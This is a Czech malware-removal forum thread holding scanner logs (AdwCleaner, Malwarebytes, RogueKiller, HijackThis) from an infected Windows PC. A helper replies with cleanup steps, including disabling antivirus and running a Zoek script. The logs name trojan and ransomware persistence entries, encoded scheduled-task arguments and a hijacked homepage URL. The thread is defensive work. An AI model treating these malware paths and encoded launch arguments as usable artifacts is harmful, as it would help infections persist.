[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
[-] Klíč smazán: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
[-] Klíč smazán: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5E6A8DA1-5731-465B-B036-B9E16EF26CAC}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
[-] Klíč smazán: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\GlobalUpdate
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\PPStream
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\INSTALLPATH\STATUS
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\mtPlusdax
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Installer
[#] Klíč smazán po restartu: HKCU\Software\GlobalUpdate
[#] Klíč smazán po restartu: HKCU\Software\PPStream
[#] Klíč smazán po restartu: HKCU\Software\INSTALLPATH\STATUS
[#] Klíč smazán po restartu: HKCU\Software\mtPlusdax
[-] Klíč smazán: HKLM\SOFTWARE\GlobalUpdate
[-] Klíč smazán: HKLM\SOFTWARE\SimpleFiles
[-] Klíč smazán: HKLM\SOFTWARE\SupDp
[-] Klíč smazán: HKLM\SOFTWARE\Uniblue
[#] Klíč smazán po restartu: HKLM\SOFTWARE\Uniblue\DriverScanner
[#] Klíč smazán po restartu: HKLM\SOFTWARE\SUPDP
[-] Klíč smazán: HKLM\SOFTWARE\mtPlusdax
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
[#] Klíč smazán po restartu: [x64] HKCU\Software\GlobalUpdate
[#] Klíč smazán po restartu: [x64] HKCU\Software\PPStream
[#] Klíč smazán po restartu: [x64] HKCU\Software\INSTALLPATH\STATUS
[#] Klíč smazán po restartu: [x64] HKCU\Software\mtPlusdax
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
[-] Data obnovena: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[#] Klíč smazán po restartu: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
[-] Data obnovena: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[#] Klíč smazán po restartu: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
[-] Data obnovena: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[-] Klíč smazán: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingate.info
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.info
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.info
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
[-] Hodnota smazána: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [gpuminer]
[-] Hodnota smazána: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [vProt]
[-] Klíč smazán: HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
[#] Klíč smazán po restartu: [x64] HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
***** [ Prohlížeče ] *****
[-] [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default] [favicon_url] Smazáno: hxxp://www.mystartsearch.com/webfavicon.ico
[-] [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default] [extension] Smazáno: fcfenmboojpjinhpgggodefccipikbpd
*************************
:: "Tracing" klíče smazány
:: Winsock nastavení vyčištěno
*************************
C:\AdwCleaner\AdwCleaner[C0].txt - [11335 Bajty] - [15/03/2017 17:51:07]
C:\AdwCleaner\AdwCleaner[S0].txt - [10932 Bajty] - [15/03/2017 17:24:58]
C:\AdwCleaner\AdwCleaner[S1].txt - [11008 Bajty] - [15/03/2017 17:50:27]
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [11557 Bajty] ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.2 (03.10.2017)
Operating System: Windows 10 Home x64
Ran by Nekut (Administrator) on 15.03.2017 at 17:58:58,67
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File System: 0
Registry: 1
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\SearchUrl\\Default (Registry Value)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 15.03.2017 at 18:00:38,60
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 18:04
Logovací soubor: prt.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1509
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 424435
Uplynulý čas: 5 min, 0 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Zakázáno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 1
Trojan.Boaxxe.Gen, HKU\S-1-5-21-2417313614-488722605-2671369154-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|EJCZTION, Smazání při restartu, [18446], [262116],1.0.1509
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 0
(Nebyly zjištěny žádné škodlivé položky)
Soubor: 1
PUP.Optional.Linkury.Generic, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\ROAMING\AGENT.DAT, Smazání při restartu, [2399], [360491],1.0.1509
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
RogueKiller V12.10.0.0 (x64) [Mar 13 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Webová stránka : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com
Operační systém : Windows 10 (10.0.14393) 64 bits version
Spuštěno : Normální režim
Uživatel : Nekut [Práva správce]
Started from : C:\Users\Nekut\Downloads\RogueKillerX64.exe
Mód : Prohledat -- Datum : 03/15/2017 18:32:54 (Duration : 00:21:11)
¤¤¤ Procesy : 0 ¤¤¤
¤¤¤ Registry : 11 ¤¤¤
[PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458} -> Nalezeno
[PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233} -> Nalezeno
[Suspicious.Path|VT.VirTool:Win32/VBInject.AGS!bit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [-] -> Nalezeno
[Suspicious.Path|VT.VirTool:Win32/VBInject.AGS!bit] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [-] -> Nalezeno
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> Nalezeno
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> Nalezeno
[Suspicious.Path|VT.VirTool:Win32/VBInject.AGS!bit] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [-] -> Nalezeno
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> Nalezeno
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> Nalezeno
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{2745AA29-3952-43AA-B153-6B58BDAF514D}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Nalezeno
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{25CFBDAA-1221-403A-AB6F-ED4028F32280}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Nalezeno
¤¤¤ Úlohy : 5 ¤¤¤
[Suspicious.Path] %WINDIR%\Tasks\GFQtQALtXtjqpHeY4.job -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Nalezeno
[Suspicious.Path] %WINDIR%\Tasks\wHAbZSf.job -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Nalezeno
[Suspicious.Path] \GFQtQALtXtjqpHeY4 -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Nalezeno
[Suspicious.Path] \ProgramDataUpdater -- "C:\windows\pdusvr.exe" -> Nalezeno
[Suspicious.Path] \wHAbZSf -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Nalezeno
¤¤¤ Soubory : 5 ¤¤¤
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.102.217.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.103.32.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.91.22.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.99.9.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe -> Nalezeno
¤¤¤ WMI : 0 ¤¤¤
¤¤¤ Soubor HOSTS : 0 ¤¤¤
¤¤¤ Antirootkit : 0 (Driver: Nahrán) ¤¤¤
¤¤¤ Webové prohlížeče : 1 ¤¤¤
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : homepage [https://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWqICWRlg5p-TqszN326G3dy3mHYlJU_leL3IAiGvFzeaOhUIyCJcFE286UNTO4eZPO86PKEGCfrynUmXb3uq_pSnNua3I7BZYgy6kJMdsqTokNPy2WiG_-BWzOIW7ddYj86VlhSK030NLtwh40HfLYPFfyklC09xHt43i2BpT] -> Nalezeno
¤¤¤ Kontrola MBR : ¤¤¤
+++++ PhysicalDrive0: ST1000DM003-1ER162 +++++
--- User ---
[MBR] 0086f36f0b7bc8b257f89fc226376c3d
[BSP] 9e3b3c473b1db0daa516427cdae6e1cc : Windows Vista/7/8 MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 450 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 923648 | Size: 99 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1126400 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1159168 | Size: 199434 MB
4 - Basic data partition | Offset (sectors): 409600000 | Size: 753869 MB
User = LL1 ... OK
User = LL2 ... OK
- jaro3
- member of the Security team
Re: Please check my log
Close all programs and browsers. Disable your antivirus and firewall.
Prosím, odpoj všechny USB (kromě myši s klávesnice) nebo externí disky z počítače před spuštěním tohoto programu.
Spusť znovu RogueKiller ( Pro Windows Vista nebo Windows 7, klepni pravým a vyber "Spustit jako správce", ve Windows XP poklepej ke spuštění).
- klikni na „Start Scan“. V novém okně nic neměň a klikni dole na „Start Scan“,
po jeho skončení - vše zatrhni (dej zatržítka vlevo od nálezů , do bílých políček)
- pak klikni na "Remove Selected"
- Počkej, dokud Status box nezobrazí " Removal finished, please review result "
- Klikni na "Open report " a pak na " Open TXT“ a zkopíruj ten log a vlož obsah té zprávy prosím sem. Log je možno nalézt v C:\ProgramData\RogueKiller\Logs - Zavři RogueKiller.
Vypni antivir i firewall.
Stáhni
Zoek.exe
http://download.bleepingcomputer.com/smeenk/
klik nahoře vpravo na .rar-file
a uloz si ho na plochu.
Zavři všechny ostatní programy , okna i prohlížeče.
Spusť Zoek.exe ( u win vista , win7, 8 klikni na něj pravým a vyber : „Spustit jako správce“
-pozor , náběh programu může trvat déle.
Do okna programu vlož skript níže:
autoclean;
emptyclsid;
iedefaults;
FFdefaults;
CHRdefaults;
emptyalltemp;
resethosts;
click Run Script
The program will run a scan and a repair; the scan and the repair can take several minutes, so wait until it finishes. Do not click in the window!
The program will offer a restart; confirm it.
After the restart, only a black desktop may be shown for some time; that is normal. Wait until the log is created. You can save it, for example, to Documents; otherwise it is saved automatically to:
C:\zoek-results.log
Copy the entire contents of that log here.
MBAM once more.
+
Post a new HJT log + report any problems
When working with HJT, ComboFix, MbAM, SDFix and similar programs, close all other applications and browsers!
Do not send logs in private messages. While I am away, memphisto, Žbeky and Orcus stand in for me.
If you are satisfied, you can support our forum: Support the forum
Re: Please check my log
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 21:21:58, on 15.03.2017
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.14393.0953)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\Nekut\Downloads\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,SearchAssistant = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = www.google.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll
O4 - HKLM\..\Run: [Autodesk Desktop App] "C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe" -tray
O4 - HKLM\..\Run: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
O4 - HKLM\..\Run: [4StoryPrePatch] C:\Program Files (x86)\GameforgeLive\Games\CZE_ces\4Story\PrePatch.exe
O4 - HKLM\..\Run: [GameforgeLive] "C:\Program Files (x86)\GameforgeLive\gfl_client.exe" -autostart
O4 - HKCU\..\Run: [OneDrive] "C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - HKCU\..\Run: [DAEMON Tools Lite Automount] "C:\Program Files\DAEMON Tools Lite\DTAgent.exe" -autorun
O4 - HKCU\..\Run: [BitTorrent] "C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe" /MINIMIZED
O4 - HKCU\..\Run: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
O4 - HKCU\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [SpybotPostWindows10UpgradeReInstall] "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
O4 - HKUS\S-1-5-18\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Autodesk Sync] C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe (User 'Default user')
O4 - Global Startup: O&O Defrag Tray.lnk = ?
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted IP range: http://192.168.10.1
O15 - ESC Trusted IP range: http://192.168.10.1
O18 - Protocol: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O18 - Protocol: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
O20 - Winlogon Notify: SDWinLogon - SDWinLogon.dll (file missing)
O23 - Service: Autodesk Desktop App Service (AdAppMgrSvc) - Autodesk Inc. - C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: @%SystemRoot%\system32\DiagSvcs\DiagnosticsHub.StandardCollector.ServiceRes.dll,-1000 (diagnosticshub.standardcollector.service) - Unknown owner - C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe (file missing)
O23 - Service: Disc Soft Lite Bus Service - Disc Soft Ltd - C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: FlexNet Licensing Service 64 - Flexera Software LLC - C:\Program Files\Common Files\Macrovision Shared\FlexNet Publisher\FNPLicensingService64.exe
O23 - Service: Futuremark SystemInfo Service - Futuremark - C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe
O23 - Service: Služba Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
